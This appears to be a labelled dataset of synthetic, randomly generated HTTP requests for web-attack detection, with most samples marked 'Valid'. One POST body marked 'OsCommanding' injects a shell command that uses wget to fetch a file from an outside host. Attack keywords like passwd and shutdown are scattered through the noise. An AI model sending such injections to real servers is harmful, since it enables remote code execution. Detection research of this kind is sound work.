Trailer: If-None-Match
User-Agent: Vma1s/5.5
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9397x4761
Via: 9.6 www.ctruiu.jpg, FTP/8.8 www.eqS5.htm, 6.1 www.prfes.jpg:60
Transfer-Encoding: deflate
Upgrade: mre/2.4, ebeai/1.2, ouoaci/4.9
Warning: 217 201.65.24.14 "trTmQnnra" "Fri, 16 Apr 04 06:13:32 CET"
X-Forwarded-For: 134.223.187.109
X-Serial-Number: 30599
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38507
Start - Id: 19888
class: Valid
GET /onR/x4i5pQchoX/U@O1bscriptNOT/rjV6YWzmal5VW/o.UI0R-11y_f@wvFBwH/eCN69TUu/ysQ/ndoophhnm5/t0Pra3EErihctn/5aArtt/0ewa0bak/oxvjMDUi6yeu.php?OeLxe4xybf=iihavingo%3Cdctcatfdu&impE=eei9n08nahib&mHvPj9ci=mmX8zpQXf&FMzXbin_andFMq93=3O%7Erplx&vIz=25+el+3Spy%5C%24h&Jt7JmetauhavinggGo=8&oediftEbe=7cl3S2cn0&SRVlsR8iGA6M=21120 HTTP/1.1
Host: www.sHh3hbu.org
Connection: 57trtDl
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: l5hgiwed-3e;q=0.5, sgb-oscje;q=0.7, rOwaRnid-l;q=0.8, esihi-t5lao0o, oanlet-eta
Cache-Control: only-if-cached
Client-ip: 203.92.31.130
Cookie: ml=eJd5
Cookie2: $Version="256"
Date: Thu, 15 Apr 04 10:48:24 CET
ETag: "Bj_KpS7tO_B.xoRz85u"
Expect: dfhaseA=enbhte;eaotIr=auhdL
From: eyip@hrwq9sA7a3.org
If-Modified-Since: Fri, 10 Feb 06 15:32:33 CET
If-Unmodified-Since: Wed, 13 Dec 06 12:29:22 UTC
If-Match: "sJCcd8yJLXmCLWOtk"
If-None-Match: "H_BupDD5@qpn1z_CsFu"
If-Range: "oN4Vx7sVUOlTfXt7"
Max-Forwards: 2
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM dWozYXRwb29tc3lvY3MwYW50ZXdhVW1ueXNyaG5TeHRPaXBoc2Vl
Authorization: NTLM bmVyZGhoaXYyQmRiZGVzZ3RjYmhybG9tc2RzZWVlZHNyaXN0YWUwRG5ad2Ju
Range: 3910-41090
Referer: /kndyobem/teLOI5.jsp
TE: gzip,trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/8.9 (compatible; MSIE 8.1; WinNT; oaWral; ceEl6plim; etaesfmh)
UA-CPU: StrongARM
UA-Disp: 1517,0390,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 205x6501
Via: HTTP/7.8 www.ooas.jpg:51095
Transfer-Encoding: yawt
Upgrade: aSn/7.4
Warning: 796 165.248.243.125:49 "nsa0mTYgni7ti" "Wed, 31 Mar 10 02:21:30 UTC"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 11565952861690
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19888
Start - Id: 555
class: Valid
GET /os4ej9nfuheno5nao3Nt/.FtZD/aO/SSvw3L5G/RBgE2/IAdtgospi.dll? HTTP/1.1
Host: www.eprB.it
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-icelandic;q=0.4, koi8-r
Accept-Encoding: gzip, gzip;q=0.1, compress, compress, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 19.12.1.144
Cookie: 5b=vP/fo;lEltb=uMhioy;APdaOB726=ni s10aLo;nxye=aoa
Cookie2: $Version="404"
Date: Fri, 13 Feb 09 09:46:55 GMT
ETag: W/"envi22wvxtBni@un"
Expect: 8mlnolre=hrua
From: pasea@rsg3kzoak.biz
If-Modified-Since: Tue, 14 Apr 09 04:55:09 GMT
If-Unmodified-Since: Wed, 16 Jan 08 10:21:09 CET
If-Match: *
If-None-Match: "x3Y4b7vtLtjJf07ll"
If-Range: Tue, 01 Apr 08 10:05:53 GMT
Max-Forwards: 3
MIME-Version: 0.8
Pragma: aeks='5'
Proxy-Authorization: Basic N2dtVGFzOjh4cnRw
Authorization: Basic ZW9nem9yYTpzbHJlYW5w
Range: 5753-
Referer: http://oziu.net/mcst/eu0sn0hY/ilTte.css
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.0 (Windows; U; Win 9x 1.5; ml-sn; rv:0.7.0) Gecko/56505913
UA-CPU: MIPS
UA-Disp: 7032,830,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 275x6652
Via: 0.9 www.prn9asay.htm, 3.8 62.67.246.53, ebiVe/4.4 www.tisesi.tiff
Transfer-Encoding: compress
Upgrade: tth/7.2, dia/5.2, 17ohEa/5.1, dn2/4.0, lsaabo/1.1
Warning: 256 www.fsdPc.htm "rHeIzlrwN64st" "Sun, 11 Jul 04 05:24:39 CET"
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 602347866565729
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 555
Start - Id: 7386
class: Valid
PUT /cn1nyboeewetek4afrtJ/sbom4wGe/oinns3ai86Lveqeoo/alebp6iraugdr2b3rcou/ipT/eK.KPNL5Mk9T@8N.nsf? HTTP/1.1
Content-Length: 149
Content-Language: nfniemrx,gd
Content-Encoding: deflate
Content-Location: /asaht/vLren/aecri30/twrhi.mpg
Content-MD5: ZWVpZXNoeWUzcmlMZGljZw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Apr 08 11:22:34 GMT
Last-Modified: Tue, 10 Jul 07 12:07:20 CET
Host: www.Htrmy.de:80
Connection: close
Accept: text/*;q=0.0
Accept-Charset: x-mac-roman, windows-1253;q=0.1, iso-2022-jp;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.8
Cache-Control: max-stale=1
Client-ip: 167.163.244.45
Cookie: 4aFn=4286023
Cookie2: $Version="490"
Date: Sun, 22 Aug 04 07:16:17 UTC
ETag: W/"h0Ub3tGUQhgHBSBo5X"
Expect: xastsswn=l3tnnlNx
From: coe5re@9jhe.fr
If-Modified-Since: Thu, 19 Apr 07 10:08:06 UTC
If-Unmodified-Since: Thu, 16 Feb 06 06:52:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8652
MIME-Version: 5.7
Pragma: rheed='tre'
Proxy-Authorization: Basic aXl0Yjpzc2NoaXJ0bg==
Authorization: Digest opaque="eo5t"
Range: 548915-60
Referer: http://i4h8h.de/pzhTsoii/etnnnje/p6eoete.rar
TE: chunked,trailers,trailers
Trailer: Pragma
User-Agent: akhinei/0.0.2.7.1
UA-CPU: StrongARM
UA-Disp: 621,301,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 850x401
Via: eis/3.1 168.245.88.248
Transfer-Encoding: rtlaa; arliahe=Eeig
Upgrade: pst/9.7, oub/7.2
Warning: 129 www.b5xcg9r.htm:36876 "FiaNtata6i" "Sat, 06 Feb 10 04:16:05 UTC"
X-Forwarded-For: 47.72.36.31
X-Serial-Number: 557256998518
----: -----------------
~~~~~: ~~~~~~~~~~~

uaaAnt2=nhtna&dTB6lroetihi=8633050&Allsetasyieeud=m2HuNItuEkhnizasn&vzns=amcatboot.iniaxaiseESw&ego=thh33wTwK&haasr7eu=egflGZFlCUM&r0asnkIwtcuwuSe=ai

End - Id: 7386
Start - Id: 18826
class: Valid
GET /mAoystrrwpr/wmehztle/Ll/lBK1L6o@2_hy8qMR/ashoaTteorzsu4e/1dmBwxjUchildm8passwdzall/btp.png?t7cojweRoseaial=a6J%405R2piH&seOyi9ibcEmEi=6932&glesoains=90&eCepdr=ehoidnn&netr7clo6=a_d%40XW&thbbkksdsmranqu=01365&uomdasktEt=hyCX2Ffigm&anenyes7miaci=r&iopeevarrfh6l=45&Ra=9&tihaToknHlonn=78&YTweeesonw=iframeperlTa&V3FCZkhomenknU=stuinode+&icehnhRproe=iWUAts HTTP/1.1
Host: 60.190.65.244
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=06
Client-ip: 208.166.219.41
Cookie: rng=e8Ncmda;roo7tbOt=0rth2uo;jagzi=4s5nTnl4k7fVn
Cookie2: $Version="143"
Date: Sat, 27 Aug 05 16:34:45 UTC
ETag: W/"ZzracHEwAxf3@pJqt@f"
Expect: 100-continue
From: b4nur@3Jrln.com
If-Modified-Since: Wed, 15 Nov 06 23:54:44 CET
If-Unmodified-Since: Tue, 26 Jan 10 12:58:21 CET
If-Match: *
If-None-Match: *
If-Range: "gSNEwIN10QbYiAIt"
Max-Forwards: 9092
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: ishl 5ute=bsrhted
Authorization: Digest response="0a27A304cEABAFd9b4Bc7AFEEe4eDeDE"
Range: -9,1224-02
Referer: http://alaat.be/Bzut/Lcipnee.dll
TE: deflate;q=0.6,deflate;q=0.5,trailers
Trailer: If-Range
User-Agent: rJta0t/8.6.8.3.7
UA-CPU: x86
UA-Disp: 941,1451,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4147x8311
Via: 1.6 www.umurdm.htm, FTP/8.7 www.lkswife.html
Transfer-Encoding: iyma; teit=heooaa
Upgrade: ueeI/0.8
Warning: 301 83.66.42.15 "oSnotrm9sowssxe8" 
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 0589105482767734530
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18826
Start - Id: 30662
class: Valid
GET /rutanZEiiqJeRSrmn0se/XokCPSwget_54imgG/ppoBd5pu7y/nVfXysQ61guKz/icTGXVQ5FddP1ls/meMeslht0ei9.cfm?5jrtncaheiev7h=ee8aeEZmhtissh&lrtma=asczSo&behnmp4=Eteeybtes%24&5u=systemsim3bOart77alinkh&ttnnnehwi3ep=lkiE&YBbetween1select=6421&ermahtSd8b=9r3sXHbUWX2&pezbzu-=+wlneoeu5todde HTTP/1.1
Host: www.oeteegta.be
Connection: close
Accept: application/*;q=0.5, video/mpeg;q=0.4, text/plain;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.3, identity, gzip;q=0.3, gzip, gzip;q=0.8
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 65.56.64.79
Cookie: ID9zHU9kI=h\between;2zplKJ=heN;tTCgsi1nErhw=iddxyy9oytEaJsi]srf
Cookie2: $Version="84"
Date: Fri, 05 Oct 07 10:42:42 CET
ETag: "hU2jxW9l_8kAduKYw0te"
Expect: 100-continue
From: ceAnse@0hhlitFdht.fr
If-Modified-Since: Sat, 06 Nov 04 04:35:13 GMT
If-Unmodified-Since: Sat, 10 Jun 06 22:34:37 UTC
If-Match: "N77mP4q9QKCTKyrFuB"
If-None-Match: *
If-Range: Sat, 27 Jun 09 21:45:46 GMT
Max-Forwards: 444
MIME-Version: 1.3
Pragma: yu5=nnt
Proxy-Authorization: otnae s4trl2e=Mefno
Authorization: Digest uri=/imtn.jpeg
Range: 69794-,-704
Referer: /eleap/els9/olir/jdeoctdn/ntgfio.png
TE: gzip,trailers
Trailer: Date
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 5.6; tn-hv; rv:2.4.7) Gecko/28389636
UA-CPU: PowerPC
UA-Disp: 7934,865,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7462x1873
Via: FTP/7.9 www.Pslse.jpg, deoimt/2.7 193.41.150.125, 4.1 www.jrkh.jpg
Transfer-Encoding: gzip
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 047 www.Vcie.gif:267 "ksqsddinwgeeW" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 62673072943112918
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30662
Start - Id: 7396
class: Valid
PUT /b9UJFw0wkQdmV1./eZ711UfWb/ko0tt2maperf/l9gn1O0n3N-gYGDSx.pl? HTTP/1.1
Content-Length: 79
Content-Language: rHZei
Content-Encoding: gzip
Content-Location: /plnOh.dll
Content-MD5: MnlsaG11bmR1VFNuYXNlcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Apr 10 17:11:30 GMT
Last-Modified: Sat, 31 Jan 04 06:38:22 CET
Host: www.dnwec4s47i.st
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.5
Cache-Control: min-fresh=13
Client-ip: 18.26.124.162
Cookie: fvr6T=ns.z8nO@kd;wal=e@T2US
Cookie2: $Version="34"
Date: Sat, 10 Sep 05 09:52:44 GMT
ETag: W/"3AxRsEszWGY9.fC"
Expect: 100-continue
From: p4dremdP@srvk.ch
If-Modified-Since: Tue, 23 Jun 09 19:51:51 CET
If-Unmodified-Since: Wed, 07 Nov 07 23:33:57 CET
If-Match: "DmIQrXBj8b@I@Zr"
If-None-Match: *
If-Range: "Kd7nUxAeOvYTQacG49q"
Max-Forwards: 4771
MIME-Version: 0.7
Pragma: earneo0='8soz'
Proxy-Authorization: NTLM Z3RkMmNwMFRFMXdwdHR0bnNlZHRucmZuNW5lbXRlNlNlaW5lS2Vo
Authorization: Digest cnonce="aehot"
Range: 12-25753
Referer: /b0mit/xaDpm/rltatiU/6S6m2si4.wmn
TE: chunked;q=0.2
Trailer: Proxy-Authorization
User-Agent: totnfqts (r1Nbdun4; iIYxuQzqB; eBr-sf@s)
UA-CPU: StrongARM
UA-Disp: 621,301,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 850x401
Via: FTP/4.4 www.toRny4b.tiff, 1.8 40.3.255.57, 5.5 www.dhctae.jpeg
Transfer-Encoding: identity
Upgrade: arsv/7.3, gzM/6.6, neme/1.8, raLOwa/5.7
Warning: 129 www.b5xcg9r.htm:36876 "FiaNtata6i" "Sat, 06 Feb 10 04:16:05 UTC"
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 34150239998
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eah1ji=abpas&elmkihswsdoT65=system~ee&0Wehv.9Xnt=tib&anent2et9a2ao=6D6rFpmbf4

End - Id: 7396
Start - Id: 8914
class: Valid
GET /nkNKfpB7gjNEJIf/Yvt.swf?edeeudoeTn=ypLtz&euAow7=tA1oaclaDrte&emt1t7tafrlee=649968&zN=toP%40GhZTZgF&eetgetSn=rg9%5C&uetggpo0ssAi=yusrmr%28oreFIss&Bz0n-NPB0g=%3C%3Ap&ekT3nf=asdlbgIiUe&eEp=%24+oee&ui3iyn3on=8o%26nemochatbetween%28ddeloowi&iZftMlog=yeszh9Ei52ssanrmpe HTTP/1.1
Host: 207.20.97.236:80
Connection: close
Accept: audio/x-wav;q=0.1, audio/*;q=0.6, image/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: lsbe-if, 0ba-RiSiE;q=0.9, e-nsaord;q=0.0, srg8n-e;q=0.4
Cache-Control: min-fresh=2351
Client-ip: 94.217.250.252
Cookie: vcg8kDmail.kO=rTeance0eaA;clE-=6ovtkdt5ywcst6;iframeNkjTaGpassthrulink=o18lh57l8nfTjhaog;i23lThe=lvs;CiCElXd@iYqQ=nmYf_dLOxq;ty=76rs tcotonit
Cookie2: $Version="266"
Date: Wed, 03 Aug 05 22:56:24 UTC
ETag: "o_YERB0dpVOt2YXC"
Expect: d9ctOe=heth;tUanr5o=xgazT
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Sun, 05 Dec 04 13:07:50 CET
If-Unmodified-Since: Sun, 23 Nov 08 11:55:26 UTC
If-Match: "KT_YBLo2MHIuP1qaX"
If-None-Match: "J41NEoiNYYC_GZ7b"
If-Range: "Ld@KrUh8fHlXTDG_sI"
Max-Forwards: 2716
MIME-Version: 7.9
Pragma: oi=7e17S
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM eWNlbnV0cmllb2phbGVudWE5aTJlZWxvc3JtNmk2ZW8=
Range: 7-3572
Referer: /ear62ci/b8ss/ainaavl8/1kNWe.mdb
TE: chunked;q=0.4,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/8.2 (Windows; U; WinNT 6.1; S0-Th; rv:4.5.9) Gecko/04969962
UA-CPU: 68000
UA-Disp: 7865,493,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x5970
Via: 6.3 65.101.129.100, 8.6 83.255.140.74
Transfer-Encoding: deflate
Upgrade: D54Tc/5.2
Warning: 052 65.130.149.140 "iFomeu7jcadiest" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8914
Start - Id: 19182
class: Valid
GET /a3lBaioakwiaheb9e/y34GyElbs76eJF/K2ldJeusrwqq5/vbscriptHrh4Z3vvr5OC/hacdifetB/de45.swf?mdbdzegteuedrqj=7827330844&NtRs=o+nhhvz HTTP/1.1
Host: www.tbj9Scwtne.org:1
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: Eqe6-wnun1r;q=0.6, Sff-nrcijwo;q=0.6, feaeyo5-intf
Cache-Control: no-store
Client-ip: 68.134.240.21
Cookie: reeeelaeoGrgo0=933693;aTq@=roi9%umsn9lc\i;lglsna=m3Yy8;eTde3lme2dse=e4yC@;jfe6rsneMuoes4=fBedocumentU;wtop6e0swee4e=g)sd rltnlit
Cookie2: $Version="126"
Date: Sun, 29 Jan 06 10:50:39 UTC
ETag: "XXbWNAaYxx7_uesRJe"
Expect: 100-continue
From: ToNpsn@tvfalhel.biz
If-Modified-Since: Sat, 19 Apr 08 03:02:21 CET
If-Unmodified-Since: Fri, 16 Dec 05 07:59:52 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: ag5po itr4d2no=erCni
Authorization: Basic N2hieGFlOmF3dHcwcw==
Range: 637-,71710-966266
Referer: http://www.tets.de/rmtz/wse5e1f/ea1e.rar
TE: gzip,trailers
Trailer: If-Range
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 7.2; to-ch; rv:8.2.7) Gecko/36336537
UA-CPU: 68000
UA-Disp: 246,582,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 923x3383
Via: HTTP/4.0 www.bt1do.jpg, HTTP/4.8 210.116.164.67:9, HTTP/5.5 114.60.239.142
Transfer-Encoding: deflate
Upgrade: woeUzU/1.5, tnls/8.6, B9a/0.3
Warning: 766 111.23.99.19 "ltboo8yptdoEtUi9nb" 
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 1861049652
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19182
Start - Id: 1938
class: Valid
GET /oFWZS9IqjKOFbVzGh/mgmxQ-8@ss/iqje7f8tj@HXf/Gb@XPvUM/rY/a3itx/ynminadebedTtEont/Rp_xt7v/sO1uyDT@yX8Wpqs/l3s-wG/_vBFr38D/k3ul-4.html?2sywS2ocwrtdDwr=4814&cEelepOesse=Se6eRi&oneittfmt=roitelnetsa&DsiseacliQm=9w2nctu&ai=th%2Fe7oKok2t&nEgmre3=hy+hpdts&Dist=tmpnsA+ HTTP/1.0
Host: www.meuEnysyss.st
Connection: inLe
Accept: */*;q=0.8
Accept-Charset: windows-1258;q=0.0, x-mac-japanese
Accept-Encoding: *;q=0.6
Accept-Language: oidiIoi-o8neyee;q=0.3, lQeee1-aE
Cache-Control: max-age=74994
Client-ip: 191.148.220.19
Cookie: oaexLmcvuin=40540859;goridnerL=on;ewlu4edntel=4Naacadnr
Cookie2: $Version="49"
Date: Thu, 13 Nov 08 16:20:23 UTC
ETag: W/"SLmMXLc63s.SN-b7H1Rf"
Expect: r6od=urssnn7;cduho=rrd5a9es
From: fyihtnev@d3neOnni.cz
If-Modified-Since: Thu, 12 May 05 07:30:46 GMT
If-Unmodified-Since: Fri, 21 Jul 06 17:24:11 CET
If-Match: "07eM0tl-_@yhCPdTIVO"
If-None-Match: *
If-Range: Thu, 12 Feb 04 14:32:53 GMT
Max-Forwards: 2893
MIME-Version: 1.0
Pragma: tees='Eul'
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: suela 6evhU=rEewqr
Range: -8,9401-9800,-599
Referer: /yh3aer.js
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 0.1; 7o-te; rv:8.8.4) Gecko/68837512
UA-CPU: PowerPC
UA-Disp: 2183,5316,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1543x007
Via: HTTP/8.7 25.143.160.68:03, 3.2 171.225.176.9
Transfer-Encoding: identity
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 335 124.7.71.254:492 "wCaa" 
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1938
Start - Id: 32612
class: Valid
PUT /gbLLSJR2n_PuSmxIYc/eTBTo3ICCePZj0/GNDklkNmmetamsamji/stpnih/en8witsuieqo/oMwirt/tYae/2P9/tefeiqihuolguaoSitE.gif? HTTP/1.1
Content-Length: 137
Content-Language: iltmbn
Content-Encoding: deflate
Content-Location: /lota.asmx
Content-MD5: N2RpNm1sc3Fhc3Nuc3JJdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 09:22:53 UTC
Last-Modified: Tue, 28 Feb 06 10:30:23 GMT
Host: 150.244.161.148
Connection: keep-alive
Accept: audio/basic;q=0.5, image/*, text/html
Accept-Charset: cp-932;q=0.2, x-mac-roman;q=0.8, windows-1254;q=0.1
Accept-Encoding: deflate;q=0.0, identity, gzip
Accept-Language: ihlcp-aawtgeay;q=0.6, coeowa-tbmsmAe;q=0.1
Cache-Control: no-cache
Client-ip: 163.113.91.254
Cookie: ivwbnNb=p5uimopens 
Cookie2: $Version="949"
Date: Sat, 05 Apr 08 23:54:45 UTC
ETag: W/"cw4BFNhsGmXr_fqW"
Expect: 100-continue
From: mhhvcrm@gtad.de
If-Modified-Since: Wed, 15 Aug 07 13:01:03 GMT
If-Unmodified-Since: Sun, 13 Mar 05 06:26:36 GMT
If-Match: "vmxxUm8eOKVqJ3w"
If-None-Match: "5CBrglyCidtU98q4Lb"
If-Range: Fri, 30 Jan 04 10:55:40 UTC
Max-Forwards: 55
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: adtt9 cssas=aamp
Authorization: Digest nc=cEedddD0
Range: 09-
Referer: http://syPE.gov/ioeSego/SAkj/iiusrei9/Lucho0/ioemke5.wav
TE: chunked
Trailer: Referer
User-Agent: toicf/0.5.3.7.2
UA-CPU: PowerPC
UA-Disp: 010,8436,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2740x572
Via: 2.7 45.33.67.29
Transfer-Encoding: identity
Upgrade: 0ss/3.7, rol/6.4, t7a/3.1, oeOo/5.0, iui/8.8
Warning: 600 www.oeyQ.gif:6 "MqLrrRse4tmzoe" 
X-Forwarded-For: 64.19.200.199
X-Serial-Number: 73155166220455300
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

shhi1tiCttr9=15982371&anrxch=806195&ab8lha=wjt9wadmin1a+elnevar>?otf&htacces0systemD=69861474&nvucsphaoOAYbne=t8brrvarfco&aEyatbT

End - Id: 32612
Start - Id: 11886
class: Valid
GET /yF_S/hB2ct8a-tU7uKzuYnaBa/r6/pinootiA/bVRqvMNs/aKi/.r4lib/eMs6@j9w@hUf8.i_rN5.shtml?swoset3atqe=9XF&IDdYwp-aCSV=eresbzchnzrsr3a&sMoBJK-between=hlEerrthirrbtit&uTgnrV=+bg+&0ain7ta1tk=7&rpigher=lK3By&Mt_zDQ=auc&I1t2Rtrht=drtffttHwt&1deslli=nieretftpCelttqw&0oo8a=884642&tXpncLIUx84=3&wst9bliyufer=ejhasoagnh5&rlnlwotm9=aeo1kpal1khhta HTTP/1.1
Host: 149.193.227.248:80
Connection: keep-alive
Accept: audio/*, application/postscript, text/xml;q=0.1
Accept-Charset: windows-1254
Accept-Encoding: deflate;q=0.0, identity;q=0.6, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 8.113.175.85
Cookie: sezhtcedeaok=o35o;ds=a3r;zQ_3=hmt;ans=e 0ay1i sa
Cookie2: $Version="7"
Date: Mon, 15 Mar 10 21:45:34 UTC
ETag: W/"Xeo@EaWGnDsJT@6"
Expect: 100-continue
From: okand@tidtf.it
If-Modified-Since: Tue, 26 Jan 10 10:41:01 UTC
If-Unmodified-Since: Fri, 09 Nov 07 01:47:33 GMT
If-Match: *
If-None-Match: "BMIbp-oojcp10WGL2R4"
If-Range: "Z6tW1RF12sk6yXL"
Max-Forwards: 2
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic dGV0c2lUbG46QXV0b2k=
Range: -35,-883,-072
Referer: /eCoa5dmt/pitTgiei.msf
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.2 (Machintosh; U; Mac OS X 7.1; 2p-ed; rv:4.9.6) Gecko/94120590
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 151x6583
Via: FTP/0.6 www.omtufo.tiff, 6.1 73.68.207.212
Transfer-Encoding: compress
Upgrade: 6tBb5/8.0, exe/8.3
Warning: 371 www.1cmlh.jpg "bnbD" "Tue, 30 Jun 09 11:03:01 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11886
Start - Id: 43073
class: OsCommanding
POST /lOj/ra5tifn/ffo/aO6D_-j-qNted7e/tgfoseeeghc.php3? HTTP/1.0
Content-Length: 281
Content-Language: 3hhtem
Content-Encoding: identity
Content-Location: /5ghay/5tElh/laanhnJ.jpg
Content-MD5: a2Nvb25zckk2VXVzZGVpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Apr 04 22:28:14 UTC
Last-Modified: Mon, 17 Jul 06 11:37:12 UTC
Host: 55.173.124.3:016
Connection: eeiPs
Accept: */*;q=0.6
Accept-Charset: ks_c_5601-1987
Accept-Encoding: identity, compress
Accept-Language: msnaiode-n;q=0.8, be-meB
Cache-Control: no-cache
Client-ip: 107.196.75.237
Cookie: gc8socb=eec;tarq=ah;
Cookie2: $Version="611"
Date: Sat, 13 Jan 07 16:37:02 UTC
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: aa20=ttt7;i0sl
From: sTleEdu@dtAttFd.de
If-Modified-Since: Sat, 22 May 04 13:22:12 UTC
If-Unmodified-Since: Mon, 27 Nov 06 22:11:43 UTC
If-Match: "EIcWFLd1wyGPTQrBrG"
If-None-Match: *
If-Range: "nFYupowMN3Zw0Xnal"
Max-Forwards: 211
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM Y29obnRyYWZpbzRzR2FhYW9iMWlzcnRuMjdhcHRlZm5hdGlu
Authorization: NTLM aGNUMW5vc2Zmb3N5MnJvY2RuYXI2OHVuNDlhZGhzejdyYW5yaW50ZWVnbGJlbWw=
Range: 53-,7351-3480
Referer: /ilbi/vole/mo0raqro/toelO.js
TE: gzip
Trailer: Accept
User-Agent: aeoPmoRUteen
UA-CPU: StrongARM
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0020x804
Via: FTP/1.4 www.edishi.css, FTP/0.0 202.214.241.95, 5.0 www.R2ccN.html
Transfer-Encoding: compress
Upgrade: erhri/0.9, ete2/3.4, iiro/2.4, Vfj0h/2.8, esebzr/8.5
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

Erst5T5s=nO&rdlehs=782&t7aaw0lesN= s2B?cosnincny&xxwti2=ae7s2fe0u&fa=554290995&PFlu=wF-yh@SC6Du&cfs=ekqJS50SL&51passwd80aCW7=riwnU'e3lys&An7shmnsre=076996336&enoHN="    ;   /usr/bin/wget www.maanonntme.com/si  ;&tdohdov=sq0-j7C&trSh=308&SHIY_shutdown=unlo%ui6

End - Id: 43073
Start - Id: 29407
class: Valid
GET /srminax/NeeawitO6/KlVmMK7/nZ.php4? HTTP/1.0
Host: www.ng3rl.com:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: gb2312
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 36.136.49.82
Cookie: 2iTZR=tnht\nr<zcshutdownsi;ul=fimacceptaLwie&Smo(alva;lPbgstRrolo5oii=024691;.iAA.O=r(aoptopt0f&e~xnaiel<links;JZUj6V7==4aes'ystetr;oUv1lnww=e60eiscb
Cookie2: $Version="0"
Date: Sun, 05 Mar 06 21:24:05 CET
ETag: W/"Ms0L..T-rIrmu2RDg"
Expect: sttqoos=eeog5hvt;eyle
From: itme@cihdsh.st
If-Modified-Since: Thu, 14 Apr 05 05:02:08 GMT
If-Unmodified-Since: Sun, 06 Aug 06 03:46:12 UTC
